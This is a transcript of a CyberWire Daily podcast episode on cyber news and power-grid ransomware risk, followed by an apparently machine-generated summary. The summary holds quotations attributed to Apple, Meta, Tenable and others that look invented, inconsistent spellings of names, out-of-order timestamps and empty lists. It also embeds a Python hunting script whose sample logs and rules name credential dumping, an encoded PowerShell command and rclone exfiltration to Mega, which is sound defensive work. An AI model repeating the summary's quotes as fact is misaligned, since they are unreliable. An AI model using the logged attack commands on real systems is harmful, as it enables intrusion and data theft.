Dave Bittner
You're listening to the Cyberwire network, powered by N2K.
Hey everybody, Dave here. Have you ever wondered where your personal information is lurking online? Like many of you, I was concerned about my data being sold by data brokers, so I decided to try DeleteMe. I have to say, DeleteMe is a game changer. Within days of signing up, they started removing my personal information from hundreds of data brokers. I finally have peace of mind knowing my data privacy is protected. DeleteMe's team does all the work for you, with detailed reports so you know exactly what's been done. Take control of your data and keep your private life private by signing up for DeleteMe now at a special discount for our listeners today. Get 20% off your DeleteMe plan when you go to JoinDeleteMe.com/N2K and use promo code N2K at checkout. The only way to get 20% off is to go to JoinDeleteMe.com/N2K and enter code N2K at checkout. That's JoinDeleteMe.com/N2K, code N2K.

Retired General Paul Nakasone warns the US is falling behind in cyberspace. Australia orders government entities to remove and ban Kaspersky products. FatalRAT targets industrial organizations in the APAC region. A major cryptocurrency exchange reports the theft of $1.5 billion in digital assets. Apple removes end-to-end encryption for iCloud in the UK. Researchers uncover a LockBit ransomware attack exploiting a Windows Confluence server. Researchers uncover zero-day vulnerabilities in a widely used cloud logging utility. A PayPal email scam is tricking users into calling scammers. Republican leaders in the House request public input on national data privacy standards. A Michigan man faces charges for his use of the Genesis cybercrime marketplace. Our guest is Karl Sigler, Senior Security Research Manager from Trustwave SpiderLabs, explaining the domino effect of a cyber attack on the power grid. And Meta sues an Insta extortionist. It's Monday, February 24th, 2025. I'm Dave Bittner and this is your Cyberwire Intel Brief. Happy Monday and thanks for joining us. 
It is great to have you here with us. Retired General Paul Nakasone warned that the US is falling behind in cyberspace, with adversaries expanding their capabilities. Speaking over the weekend at DistrictCon in Washington, D.C., he cited Chinese-backed breaches and ransomware attacks as evidence of weak cybersecurity. He also expressed concern about cyber operations causing physical damage, predicting future attacks could disable platforms through digital means. Nakasone, now at Vanderbilt University, highlighted AI's role in cyber offense, including autonomous targeting by AI-powered drones. He questioned the limits of AI-driven cyberweapons and their ability to bypass defenses. He endorses a more aggressive US cyber strategy, citing past Cyber Command operations against Russian and Iranian hackers. He emphasized persistent engagement to keep cyber enemies in check. Nakasone stressed the need for top cyber talent, warning of recruitment challenges due to past government actions. He acknowledged ongoing Cyber Command reforms but avoided direct criticism of political leadership changes, stating that presidents choose their own advisers.

Australia has ordered government entities to remove and ban Kaspersky products, citing security risks. The order, issued by the Department of Home Affairs, requires all federal systems to eliminate Kaspersky software by April 1, though no specifics were provided. The move aligns with concerns over Russian government influence on the company. The decision follows a similar US ban, which began in 2017 and expanded in 2024, leading Kaspersky to exit the US market. The company sold its US customer base to Ultra AV, though the transition faced issues. While Australia previously monitored US actions without immediate restrictions, it has now joined other countries in barring Kaspersky from government networks. Several European nations have already blocked the company's products for years. Kaspersky has yet to comment on Australia's decision. 
Meanwhile, according to researchers with Kaspersky ICS CERT, Chinese-speaking hackers are targeting industrial organizations across the Asia-Pacific region with the FatalRAT remote access trojan. The cyber espionage campaign exploits legitimate Chinese cloud services, including Youdao Cloud Notes and Tencent Cloud, to evade detection. The attack focuses on manufacturing, energy, IT and logistics sectors in Taiwan, China, Japan, Thailand and Singapore. Hackers distribute phishing emails and WeChat or Telegram messages disguised as tax documents to deliver malware. The infection process involves multiple evasion techniques, including DLL sideloading and anti-virtual-machine checks. FatalRAT logs keystrokes, exfiltrates data and allows remote execution of destructive commands like MBR corruption. Kaspersky warns of risks to operational technology systems and advises network segmentation, DLL sideloading monitoring, and blocking known indicators of compromise.

Bybit, a major cryptocurrency exchange, reported a cyber attack that led to the theft of $1.5 billion in digital assets. Hackers exploited a vulnerability in the smart contract logic, gaining control of an ETH cold wallet and transferring over 400,000 ETH and stETH. The attack may have involved a flaw in the Safe Global platform's user interface. Despite a surge in withdrawal requests, Bybit assured users their funds remain secure. CEO Ben Zhou stated the exchange is solvent and can cover the loss with its $20 billion in assets if needed. The attack comes amid rising crypto-related cybercrime, with Chainalysis reporting $2.2 billion stolen in 2024, a 20% increase from the previous year.

Apple has removed end-to-end encryption for iCloud in the UK, following secret data access demands from the government under the Investigatory Powers Act, sometimes referred to as the Snoopers' Charter. Security and consumer rights experts are calling for lawmakers to hold the government accountable. 
Apple argues that creating an E2E backdoor for the government would compromise all users' security. Instead, it removed the Advanced Data Protection feature for UK customers, disappointing privacy advocates. Experts warn this decision could weaken the UK's data security reputation and impact data flows with the EU. Critics say the move sets a dangerous precedent, emboldening other governments to demand similar access. Some warn it could lead to compliance issues for businesses operating in Europe and even threaten the UK's data sharing agreement with the US.

Security researchers at The DFIR Report have uncovered a LockBit ransomware attack that exploited a Windows Confluence server. The attackers gained initial access through a remote code execution vulnerability, quickly deploying Mimikatz, Metasploit and AnyDesk to escalate privileges and move laterally across the network via RDP. They used rclone to exfiltrate data to mega.io before executing the ransomware. PDQ Deploy was leveraged to automate the spread of LockBit across critical systems, ensuring widespread encryption. The entire attack, from initial compromise to ransomware deployment, was completed in just two hours. The researchers emphasized the importance of patching Confluence vulnerabilities, monitoring network activity and restricting remote access to prevent similar intrusions. This case underscores the growing sophistication and speed of ransomware operations targeting unpatched enterprise applications.

Security researchers at Tenable uncovered zero-day vulnerabilities in Fluent Bit, a widely used logging utility embedded in cloud platforms like AWS, Google Cloud and Microsoft Azure. The flaws are null pointer dereference weaknesses in the Prometheus remote write and OpenTelemetry plugins, exposing billions of production environments to cyber threats. Attackers can crash Fluent Bit servers or leak sensitive data using simple HTTP requests. 
These vulnerabilities affect Kubernetes deployments, enterprise logging systems, and compliance workflows, with major users including Cisco, Splunk and VMware. Patches are available, but unpatched systems remain at high risk. Experts urge immediate updates, API access restrictions and security audits to prevent widespread service disruptions and data leaks.

A PayPal email scam is tricking users into calling scammers by sending fake purchase confirmations from PayPal's legitimate email address, service@paypal.com. The scam exploits PayPal's address settings, allowing attackers to insert fraudulent messages into the address 2 field. Victims receive an email stating that their shipping address has changed for a MacBook purchase and are urged to call a fake PayPal support number. Once on the call, scammers convince victims to install remote access software, enabling theft of funds, data or malware deployment. The emails bypass security filters because they originate directly from PayPal's servers. Users are advised to ignore the email, verify their account directly via PayPal, and not call the provided number. Experts recommend PayPal limit character input in address fields to prevent abuse.

Republican leaders on the House Energy and Commerce Committee, Brett Guthrie from Kentucky and John Joyce from Pennsylvania, are requesting public input on how to develop national data privacy and security standards. They issued a request for information to guide legislation that would protect Americans' digital data across various services. The lawmakers acknowledged the challenges posed by rapid technological advancements and conflicting state and federal laws. Their request seeks insights on data collection, transparency, user consent and lessons from international privacy laws. They also want input on how a federal privacy law would interact with existing regulations like HIPAA, FCRA and COPPA. 
Congress has long debated digital privacy legislation, but past efforts have failed due to political disagreements. The public can submit responses by April 7. Lawmakers hope to finally establish baseline privacy protections similar to those in other Western nations.

The U.S. Justice Department has charged Andrew Shenkosky, age 29, for purchasing 2,500 stolen login credentials from the Genesis Market cybercrime marketplace in 2020. Authorities say he used stolen credentials to steal money from a bank account and attempted to sell data on RaidForums, a now dismantled cybercrime site. Shenkosky faces charges including wire fraud and identity theft. His arraignment hearing is this week. The Genesis Market, seized by the FBI in April 2023, had provided cybercriminals access to stolen credentials. While 120 people were arrested, the site's administrators remained at large and its dark web presence later disappeared. The Justice Department previously charged a Buffalo police detective for buying stolen credentials from the site.

Coming up after the break, my conversation with Karl Sigler from Trustwave SpiderLabs. He's explaining the domino effect of a cyber attack on the power grid. And Meta sues an Insta extortionist. Stay with us.

We've all been there. You realize your business needs to hire someone yesterday. How can you find amazing candidates fast? Well, it's easy. Just use Indeed. When it comes to hiring, Indeed is all you need. Stop struggling to get your job post noticed. Indeed Sponsored Jobs helps you stand out and hire fast. Your post jumps to the top of search results so the right candidates see it first, and it works. Sponsored Jobs on Indeed get 45% more applications than non-sponsored ones. One of the things I love about Indeed is how fast it makes hiring. And yes, we do actually use Indeed for hiring here at N2K CyberWire. Many of my colleagues here came to us through Indeed. Plus, with Sponsored Jobs, there are no subscriptions, no long-term contracts. You only pay for results. How fast is Indeed? Oh, in the minute or so that I've been talking to you, 23 hires were made on Indeed, according to Indeed data worldwide. There's no need to wait any longer. Speed up your hiring right now with Indeed, and listeners to this show will get a $75 sponsored job credit to get your jobs more visibility at indeed.com/cyberwire. Just go to indeed.com/cyberwire right now and support our show by saying you heard about Indeed on this podcast. Indeed.com/cyberwire. Terms and conditions apply. Hiring? Indeed is all you need.

Cyber threats are more sophisticated than ever. Passwords? They're outdated and can be cracked in a minute. Cybercriminals are intercepting SMS codes and bypassing authentication apps. While businesses invest in network security, they often overlook the front door, the login. Yubico believes the future is passwordless. YubiKeys offer unparalleled protection against phishing for individuals, SMBs and enterprises. They deliver a fast, frictionless experience that users love. Yubico is offering N2K followers a limited buy one, get one offer. Visit yubico.com/N2K to unlock this deal. That's Yubico. Say no to modern cyber threats. Upgrade your security today.

Karl Sigler is Senior Security Research Manager at Trustwave SpiderLabs. I recently sat down with him to discuss the domino effect of a cyber attack on the power grid.
Karl Sigler
We've been focusing on the security issues, the risks taken on, the threats that are affecting specific industry sectors. So we do healthcare, we do hospitality, retail, and right now we're currently focused on energy and utilities.
Dave Bittner
Well, let's dig into some of the details here. You all were tracking ransomware incidents and some of the changes that you've seen in the past couple years there.
Karl Sigler
Yeah, and it's actually a little bit surprising just how much ransomware has increased over the years. Just this past year is up 80% over 2023, so yeah, these threat actors are not giving up on ransomware at all. They're doubling, tripling, quadrupling down on the use of ransomware.
Dave Bittner
One of the things that the research points out is the potential domino effect, as you put it, of a cyber attack on the power grid. Can you describe to us what that could entail?
Karl Sigler
Sure. I mean, we have direct examples of how that cascade, how that domino effect works. We saw it with the Colonial Pipeline breakdown, if you will, ransomware. The threat actors from DarkSide encrypted the Colonial Pipeline system and that basically prevented gas from getting to the east coast of the United States. That outage, which lasted I think a little bit over 18 days, affected airports. For instance, I'm in Atlanta, Georgia, and the Hartsfield airport had fueling problems. Some flights had to be redirected to refuel in new cities. Some flights were canceled. That has a direct cascading effect to business meetings, right? If I can't fly to get to that conference in time, I might lose a business deal. Same thing for just driving. This affected the South to a large extent, and there are a lot of people whose business is driving around. It could be delivery, it could be long-haul trucking, things like that. But if you don't have gas, that business shuts down. This had a huge economic impact. Prices of gasoline went up to the highest they had been in over six years, and that is absolutely going to cascade that economic impact through the entire nation. So yeah, one single little attack can have real widespread repercussions.
Dave Bittner
One of the things your research tracks here is that there's been a real rise in cyber attacks targeting the utilities sector. Can you add some insight to that? I mean, what makes them an attractive target?
Karl Sigler
A lot of things make the utility sector a very juicy target for these hackers and criminals out there. One, its interdependence with everything, right? We just talked about the domino effect, the cascade effect. When you attack gas, water, electricity, you are affecting all kinds of industries and businesses. You're basically taking over the supply chain for those critical utilities that we need to go through our day-to-day activities. So whether it's gasoline, whether it's electricity, and you think of how that might affect a hospital. For instance, there was a ransomware attack on a hospital that required redirecting, you know, critically ill emergency room type patients to other hospitals. There is at least one death associated with that. So these threat actors, these criminals know that if they can take hold of a utility company, the pressure on that utility company to resolve that issue is massive because of that cascade effect, because sometimes human lives are on the line. Colonial Pipeline, they ended up paying the four million dollar ransom in that case, which is something we don't want to get to. We don't want to have a situation where we're actually funding the criminal underground. So yeah, these are really important organizations. By leveraging attacks against them, you can really twist their arm and get that payout. And we also see this in just a destructive way. We see this with the Russia-Ukraine conflict right now, where Russia and Ukraine are targeting each other's infrastructures, utility, energy, gas, you name it. And they don't care about trying to get any sort of economic result out of that. They're just looking to crash those systems to cause chaos and to eliminate resources for the other country. So there's all kinds of reasons why the energy and utility sector is directly targeted, but it's just an often vulnerable and very juicy target for a lot of reasons for these criminals.
Dave Bittner
And what are the techniques and the tactics that you're seeing them use here?
Karl Sigler
Oh, primarily phishing. I know every single security talk always talks about phishing. And there's a good reason why we do it. Because phishing, especially in this case, was the initial first compromise, that initial first breach, of 84% of the compromises in the energy and utility sector based on our own research. And phishing has gotten a lot more difficult to identify. The days of being able to identify red flags like poor grammar, poor punctuation, not really knowing the industry that well, especially when it comes to business email compromise, those red flags are going away. A lot of these threat actors are using artificial intelligence to craft their phishing emails and make them more alluring to their potential victims. So phishing is absolutely the number one thing that gets them in there. And it probably should be the number one concern for protection controls that you put in place.
Dave Bittner
Where does the utility sector stand in terms of their capabilities for defending themselves? Are they well resourced to do this, or is that an ongoing struggle?
Karl Sigler
It's absolutely an ongoing struggle. We saw that. Let me see that statistic. Yeah. 40% of the U.S. power grid is over 50 years old. You know, that infrastructure is aging quickly, and when it comes to technology, things age quicker than, say, the old pipelines they used to have. So that's definitely a huge issue. And a lot of times it's because they're change averse, they're being held to specific regulations, specific auditing, and they need to make sure that they are going to pass those audits every single year or every single month. So they're not going to change anything unless it's broken. You'll find operating systems that have been abandoned, no longer getting security patches. All these things make the utility sector a lot more... They take on a lot more risk than they probably should, I'll put it that way.
Dave Bittner
Well, based on the information that you all have gathered here, what are your recommendations then? I mean, how should these folks go about best protecting themselves?
Karl Sigler
You know, a lot of the advice that we've been giving for decades sometimes is still the best advice. I will say from a mitigation standpoint, just knowing what your assets are, you know, just doing an inventory, not relying on a network diagram that somebody put together three years ago. But know exactly what you have on your networks, then you can start to get a feel for what risk those assets may be at. But if you don't know what you have, you don't know what risk you're undertaking. So asset identification is going to help you quite a bit. Proactive threat hunting. Sometimes you can't wait for these alerts to just pop up on your console. You have to go searching for this activity. So ingesting current IOCs for current campaigns that apply to your business sector, apply to your organization, and actively looking for those indicators like malware hashes, registry keys, things like that can help you identify things, limit the dwell time of those threat actors. I'd also say that something that's often missing, I see in a lot of organizations, is the incident response process. I see a lot of organizations that are so focused on proactive prevention of attacks that once they actually do get attacked, once they've been compromised in some fashion, they're not sure what to do at that point. They don't have a good formalized incident response plan in place.
Dave Bittner
That's Karl Sigler from Trustwave SpiderLabs. We will have a link to their report in our show notes.

Do you know the status of your compliance controls right now? Like, right now? We know that real-time visibility is critical for security, but when it comes to our GRC programs, we rely on point-in-time checks. But get this. More than 8,000 companies like Atlassian and Quora have continuous visibility into their controls with Vanta. Here's the gist. Vanta brings automation to evidence collection across 30 frameworks like SOC 2 and ISO 27001. They also centralize key workflows like policies, access reviews and reporting, and help you get security questionnaires done five times faster with AI. Now that's a new way to GRC. Get $1,000 off Vanta when you go to vanta.com/cyber. That's vanta.com/cyber for $1,000 off.

And finally, imagine paying rent on your own Instagram account. That's basically what Idriss Qibaa was making people do until Meta decided enough was enough. The company is suing Qibaa, accusing him of running an extortion ring called Unlocked 4 Life, where he banned and unbanned Instagram accounts for profit. And he wasn't shy about it. He bragged on the No Jumper podcast that he had over 200 subscribers and raked in $600,000 a month. But Qibaa wasn't just scamming influencers. He allegedly sent death threats, racial slurs, and even pictures of bloodied victims to those who didn't comply. He even demanded $20,000 from one victim to stop harassing them. Qibaa's Unlocked 4 Life scheme worked by gaming Instagram's reporting system to ban and unban accounts at will. Here's how he allegedly did it. Qibaa would submit false reports claiming that a target's Instagram account violated the platform's rules, things like impersonation, hate speech, nudity, or other violations. Instagram's automated moderation system often acted swiftly, disabling accounts the same day based on these reports. After getting an account banned, Qibaa would offer to help restore it for a price. Victims who paid his fee would see their accounts reinstated, while those who refused faced threats, harassment, and continued account takedowns. Meta hit back in February 2024 with a cease and desist, banning his accounts. But Qibaa, ever the entrepreneur, just made new ones. Essentially, Qibaa weaponized Instagram's own enforcement system against its users, turning a security feature into an extortion racket. Now Meta is suing him. Let's hope Meta's legal team proves harder to evade than their AI moderators.

And that's the Cyberwire. We'd love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like our show, please share a rating and review in your favorite podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com. We're privileged that N2K Cyberwire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world's preeminent intelligence and law enforcement agencies. N2K's senior producer is Alice Carruth. Our Cyberwire producer is Liz Stokes. We're mixed by Tré Hester with original music and sound design by Elliott Peltzman. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher. And I'm Dave Bittner. Thanks for listening. We'll see you back here tomorrow.

And now, a message from BlackCloak. Did you know the easiest way for cybercriminals to bypass your company's defenses is by targeting your executives and their families at home? BlackCloak's award-winning digital executive protection platform secures their personal devices, home networks, and connected lives. Because when executives are compromised at home, your company is at risk. In fact, over one third of new members discover they've already been breached. Protect your executives and their families 24/7/365 with BlackCloak. Learn more at blackcloak.io.
CyberWire Daily: Can the U.S. Keep Up in Cyberspace?
Release Date: February 24, 2025
Host: Dave Bittner, N2K Networks
In this episode of CyberWire Daily, host Dave Bittner delves into pressing cybersecurity challenges facing the United States, exploring whether the nation can maintain its competitive edge in the rapidly evolving digital battleground. The discussion encompasses warnings from retired military leaders, international cybersecurity measures, significant cyberattacks, emerging vulnerabilities, legislative efforts on data privacy, and real-world implications of cyber threats on critical infrastructure.
[02:30] Retired General Paul Nakasone, now at Vanderbilt University, issued a stark warning about the United States lagging in cyberspace. Speaking at DistrictCon in Washington D.C., Nakasone highlighted the expanding capabilities of adversaries, notably citing “Chinese-backed breaches and ransomware attacks” as indicators of the nation’s weakened cybersecurity posture.
General Paul Nakasone: “The U.S. is falling behind in cyberspace with adversaries expanding their capabilities.” ([02:45])
He expressed concerns over the potential for cyber operations to cause physical damage, predicting future attacks could “disable platforms through digital means”. Nakasone emphasized the increasing role of Artificial Intelligence in cyber offense, including autonomous AI-powered drones, questioning the safeguards against “AI-driven cyberweapons” that might bypass traditional defenses.
Advocating for a more aggressive U.S. cyber strategy, Nakasone referenced past Cyber Command operations targeting Russian and Iranian hackers and called for “persistent engagement” to keep cyber adversaries in check. He also pointed out the urgent need for top cyber talent, lamenting the recruitment challenges posed by past government actions.
[05:10] Australia has taken a significant step by mandating that all government entities “remove and ban Kaspersky products” due to security concerns linked to potential Russian government influence. The Department of Home Affairs issued an order requiring the elimination of Kaspersky software from federal systems by April 1, aligning with the U.S. ban initiated in 2017 and expanded in 2024.
The Australian order follows the U.S. ban, which began in 2017 and was expanded in 2024, prompting Kaspersky to exit the U.S. market by selling its customer base to Ultra AV; that transition has encountered challenges, including operational issues for new customers. Several European nations have barred Kaspersky from government networks for years.
The Australian government’s move underscores growing international mistrust towards Kaspersky, although the company has yet to formally respond to the ban.
[08:25] Researchers from Kaspersky ICS CERT have identified a cyber espionage campaign using the FatalRAT remote access trojan to target industrial organizations across the Asia-Pacific (APAC) region. The campaign, attributed to Chinese-speaking attackers, abuses legitimate Chinese cloud services such as Youdao Cloud Notes and Tencent Cloud to evade detection.
The targeted sectors include manufacturing, energy, IT, and logistics in countries such as Taiwan, China, Japan, Thailand, and Singapore. Attackers employ phishing emails and messaging platforms like WeChat and Telegram, disguising malware as tax documents. The infection process involves evasion techniques including DLL sideloading and anti-virtual-machine checks, after which the RAT can “log keystrokes, exfiltrate data, and execute destructive commands” such as MBR corruption.
Kaspersky ICS CERT: “Fatal RAT poses significant risks to operational technology systems. We advise network segmentation and rigorous monitoring to mitigate these threats.” ([08:50])
Recommended mitigations include network segmentation, monitoring for DLL sideloading, and blocking known indicators of compromise to protect against such targeted attacks.
[11:15] Bybit, a major cryptocurrency exchange, reported a devastating cyberattack resulting in the theft of $1.5 billion in digital assets. Attackers exploited a vulnerability in the smart contract logic, gaining control of an ETH cold wallet and transferring over 400,000 ETH and stETH.
The attack may have involved a flaw in the Safe Global platform's user interface. Despite a surge in withdrawal requests, Bybit reassured users that their funds remain secure, with CEO Ben Zhou stating, “The exchange is solvent and can cover the loss with its $20 billion in assets if needed.”
This incident occurs amid a surge in crypto-related cybercrime, with Chainalysis reporting a 20% increase in stolen funds in 2024 compared to the previous year.
[14:00] In a controversial move, Apple has removed end-to-end encryption (E2E) for iCloud services in the United Kingdom following demands under the Investigatory Powers Act, commonly known as the Snoopers’ Charter. Security and consumer rights advocates have criticized the decision, arguing it compromises user privacy and could weaken the UK’s data security reputation.
Apple Representative: “Creating an E2E backdoor would compromise all users' security. Instead, we've removed the advanced data protection feature for UK customers.” ([14:15])
Privacy experts warn that weakening encryption could lead to compliance issues for businesses operating in Europe and jeopardize the UK's data sharing arrangements with the EU and the U.S. Critics add that the move sets a dangerous precedent that could embolden other governments to demand similar access.
[16:40] Security researchers at The DFIR Report uncovered a LockBit ransomware attack that began with the exploitation of a remote code execution vulnerability in a Windows Confluence server. The attackers swiftly deployed Mimikatz, Metasploit, and AnyDesk to escalate privileges and move laterally across the network via RDP.
Data was exfiltrated with rclone to mega.io before the ransomware was deployed, with PDQ Deploy used to push LockBit across critical systems for widespread encryption. The entire intrusion, from initial compromise to ransomware deployment, took about two hours.
Researchers highlighted the necessity of “patching Confluence vulnerabilities, monitoring network activity, and restricting remote access” to prevent similar intrusions, underscoring the increasing sophistication and speed of ransomware operations targeting unpatched enterprise applications.
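The tool chain above is the kind of thing a hunt team can look for in endpoint telemetry. The following is an added example, not code from the podcast or from The DFIR Report: it runs a handful of pattern rules over constructed process and network events in a simple one-line-per-event format (the format, hostnames, IPs, paths and timestamps are all assumptions made for the demonstration) and flags when several distinct techniques show up inside a short window, which is the signal that matters when the whole intrusion runs in about two hours.

```python
"""
Added example, not The DFIR Report's or the podcast's code: a small hunt
over constructed endpoint telemetry for the Confluence-to-LockBit chain
(Java spawning a shell, Mimikatz, AnyDesk, RDP, rclone to Mega, PDQ Deploy).
Hostnames, IPs, paths and timestamps are constructed for the demonstration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime

# Constructed telemetry: "<iso timestamp> <host> <user> <event> <detail>".
SAMPLE_LOG = """\
2025-02-20T10:02:11 web01 svc_confluence process_create java.exe -> cmd.exe /c powershell -enc SQBFAFgA
2025-02-20T10:09:40 web01 SYSTEM process_create mimikatz.exe privilege::debug sekurlsa::logonpasswords
2025-02-20T10:21:05 web01 SYSTEM process_create AnyDesk.exe --install C:\\ProgramData\\AnyDesk --silent
2025-02-20T10:33:52 web01 admin network_connect 10.0.0.15:3389 proto=tcp
2025-02-20T10:48:17 dc01 admin process_create rclone.exe copy C:\\Shares\\Finance mega:exfil --transfers 32
2025-02-20T10:49:03 dc01 admin network_connect 203.0.113.10:443 host=mega.io
2025-02-20T11:55:30 dc01 admin process_create PDQDeployRunner-1.exe C:\\Windows\\Temp\\lb.exe
2025-02-20T11:58:44 fs01 SYSTEM file_create \\\\fs01\\C$\\Users\\Public\\lb.exe
"""

# (description, ATT&CK technique, pattern). The patterns are deliberately
# narrow; they match the tooling named in the report, not generic activity.
RULES: list[tuple[str, str, re.Pattern[str]]] = [
    ("Confluence Java process spawning a shell", "T1190", re.compile(r"java\.exe -> (cmd|powershell)\.exe", re.I)),
    ("credential dumping (Mimikatz)", "T1003.001", re.compile(r"mimikatz|sekurlsa::", re.I)),
    ("remote access tool install (AnyDesk)", "T1219", re.compile(r"anydesk\.exe.*--install", re.I)),
    ("RDP lateral movement", "T1021.001", re.compile(r"network_connect \S+:3389\b", re.I)),
    ("rclone copy to a Mega remote", "T1567.002", re.compile(r"rclone(\.exe)?\s+(copy|sync|move)\b.*\bmega:", re.I)),
    ("outbound connection to mega.io", "T1567.002", re.compile(r"host=mega\.(io|nz)\b", re.I)),
    ("PDQ Deploy pushing a payload", "T1072", re.compile(r"pdqdeploy", re.I)),
]


@dataclass(frozen=True)
class Finding:
    ts: datetime
    host: str
    rule: str
    technique: str
    line: str


def hunt(log_text: str) -> list[Finding]:
    """Run every rule over every event line; one line may trip several rules."""
    findings: list[Finding] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts_str, host, _user, _event, _detail = line.split(" ", 4)
        ts = datetime.fromisoformat(ts_str)
        for rule, technique, pattern in RULES:
            if pattern.search(line):
                findings.append(Finding(ts, host, rule, technique, line))
    return findings


def techniques_seen(findings: list[Finding]) -> set[str]:
    return {f.technique for f in findings}


def span_minutes(findings: list[Finding]) -> float:
    """Minutes between the earliest and latest finding (0 if fewer than two)."""
    if len(findings) < 2:
        return 0.0
    stamps = sorted(f.ts for f in findings)
    return (stamps[-1] - stamps[0]).total_seconds() / 60


def is_fast_chain(findings: list[Finding], min_techniques: int = 3, max_minutes: float = 180) -> bool:
    """Escalate when several distinct techniques appear inside a short window."""
    return len(techniques_seen(findings)) >= min_techniques and span_minutes(findings) <= max_minutes


if __name__ == "__main__":
    found = hunt(SAMPLE_LOG)
    for f in found:
        print(f"{f.ts:%H:%M:%S} {f.host:6} {f.technique:10} {f.rule}")
    print(f"{len(techniques_seen(found))} techniques in {span_minutes(found):.0f} minutes; escalate={is_fast_chain(found)}")
```

Any single rule here is noisy on its own (administrators use rclone and PDQ Deploy legitimately), which is why the escalation decision in `is_fast_chain` is made on the number of distinct techniques inside one window rather than on any one hit; in a real pipeline the window would be keyed per host or per account.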
[19:05] Tenable researchers have disclosed zero-day vulnerabilities in Fluent Bit, a widely used logging utility embedded in cloud platforms such as AWS, Google Cloud, and Microsoft Azure. The flaws are null pointer dereference weaknesses in the Prometheus remote write and OpenTelemetry plugins, potentially exposing billions of production environments.
Attackers can trigger them with simple HTTP requests to crash Fluent Bit servers or leak sensitive data. Affected systems include Kubernetes deployments, enterprise logging pipelines, and compliance workflows used by major organizations like Cisco, Splunk, and VMware.
Tenable Researcher: “Immediate updates and stringent API access restrictions are crucial to prevent widespread service disruptions and data leaks.” ([19:30])
While patches are available, many systems remain vulnerable due to delayed updates, prompting experts to urge organizations to prioritize applying these fixes and conducting comprehensive security audits.
[21:00] A new email scam exploiting PayPal’s legitimate email infrastructure has emerged, tricking users into contacting scammers directly. The scam involves fake purchase confirmations sent from service@paypal.com: the scammers abuse PayPal’s address settings by typing the fraudulent message into an address field, so that it appears in the body of a genuine PayPal notification.
Recipients receive emails stating that their shipping address for a MacBook purchase has changed, urging them to call a fake PayPal support number. Once on the call, scammers persuade victims to install remote access software, leading to the theft of funds, data, or malware deployment.
Cybersecurity Expert: “These fraudulent emails bypass traditional security filters by originating directly from PayPal’s servers. Users must verify their accounts directly through PayPal and avoid calling suspicious numbers.” ([21:20])
Experts recommend that PayPal limit character input in address fields to prevent abuse and advise users to remain vigilant against such scams by verifying account activities through official channels.
[23:45] Republican leaders on the House Energy and Commerce Committee, including Brett Guthrie (Kentucky) and John Joyce (Pennsylvania), have initiated a request for public input to shape national data privacy and security standards. The aim is to craft legislation that safeguards Americans' digital data across various services, addressing challenges posed by rapid technological advancements and fragmented state and federal laws.
Their request seeks insights on:
Additionally, they are exploring how a federal privacy law would interact with existing regulations like HIPAA, FCRA, and COPPA. The public is invited to submit responses by April 7, with the hope of establishing baseline privacy protections akin to those in other Western nations.
This marks a significant step towards unified data privacy legislation, aiming to reconcile diverse regulations and provide comprehensive protection for consumers in the digital age.
[25:10] The U.S. Department of Justice has charged Andrew Szenkovsky, 29, for his involvement with the Genesis Cybercrime Marketplace. Szenkovsky reportedly purchased 2,500 stolen login credentials from the marketplace in 2020, using them to illicitly transfer funds from a bank account and attempting to sell data on RAIDforums, a now-dismantled cybercrime platform.
He faces multiple charges, including wire fraud and identity theft, with his arraignment scheduled for this week. The Genesis Market, seized by the FBI in April 2023, had facilitated access to stolen credentials; the takedown led to the arrest of 120 individuals, though its administrators remain at large.
This case underscores the persistent threat posed by cybercrime marketplaces and the ongoing efforts by law enforcement to dismantle these illicit operations.
[17:01] Host Dave Buettner engages in a comprehensive discussion with Carl Sigler, Senior Security Research Manager at Trustwave Spider Labs, focusing on the domino effect of cyberattacks on the power grid.
Rising Ransomware Threats
[17:32] Buettner highlights a staggering 80% increase in ransomware attacks in the past year, indicating that threat actors are intensifying their focus on ransomware exploitation.
Carl Sigler: “Ransomware actors are not giving up; they're actively increasing their efforts and sophistication.” ([17:53])
Impact on Utilities Sector
Sigler explains that the utilities sector is particularly attractive to hackers due to its interdependence with all other industries. An attack on utilities like gas or electricity can disrupt hospitals, transportation, and essential services, exerting immense pressure on these organizations to resolve issues swiftly.
Sigler: “Attackers know that targeting utilities creates massive pressure because it affects everything from hospitals to transportation.” ([19:46])
Techniques and Tactics
The conversation delves into the prevalent use of phishing as the primary attack vector, responsible for 84% of compromises in the energy and utility sector.
Sigler: “Phishing remains the number one method for initial breaches, especially as AI makes these attacks harder to detect.” ([22:01])
Defense Capabilities and Challenges
Despite the critical nature of their operations, many utility companies struggle with outdated infrastructure and stringent regulatory requirements that hinder timely updates and security enhancements.
Sigler: “Forty percent of the U.S. power grid is over 50 years old, making it a vulnerable target due to aging technology and resistance to change.” ([23:15])
Recommendations for Protection
To mitigate risks, Sigler advocates for:
Sigler: “Asset identification and proactive threat hunting are essential. Additionally, having a formalized incident response plan can make the difference between containment and catastrophe.” ([24:28])
The discussion underscores the urgent need for the utilities sector to modernize infrastructure, enhance cybersecurity measures, and develop resilient response strategies to withstand and mitigate the impact of sophisticated cyberattacks.
[26:45] In a recent high-profile case, Meta (formerly Facebook) has filed a lawsuit against Idris Kiba, accused of running an extortion ring named Unlocked for Life on Instagram. Kiba manipulated Instagram’s reporting system to ban and unban accounts for profit, boasting over 200 subscribers and generating $600,000 monthly.
Victims were coerced through threats, racial slurs, and even graphic images, with Kiba demanding up to $20,000 to cease harassment. By gaming the platform's automated moderation, he ensured swift account disables, offering restoration services to paying victims while continuing to exploit those who refused.
Meta Statement: “Idris Kiba weaponized our enforcement system, turning a security feature into a lucrative extortion racket.” ([26:50])
Meta responded to his actions by issuing a cease-and-desist letter in February 2024, after which Kiba created new accounts to continue his scheme. The lawsuit aims to hold him accountable and to prevent future abuse of the platform’s enforcement mechanisms.
This episode of CyberWire Daily provides a comprehensive overview of the multifaceted cybersecurity landscape, highlighting the critical areas where the United States faces significant challenges in keeping pace with global adversaries. From warnings by military experts and international cybersecurity policies to real-world cyberattacks and legislative efforts, the discussion underscores the urgent need for robust strategies, advanced technological defenses, and cohesive policy frameworks to safeguard national and economic security in the digital age.
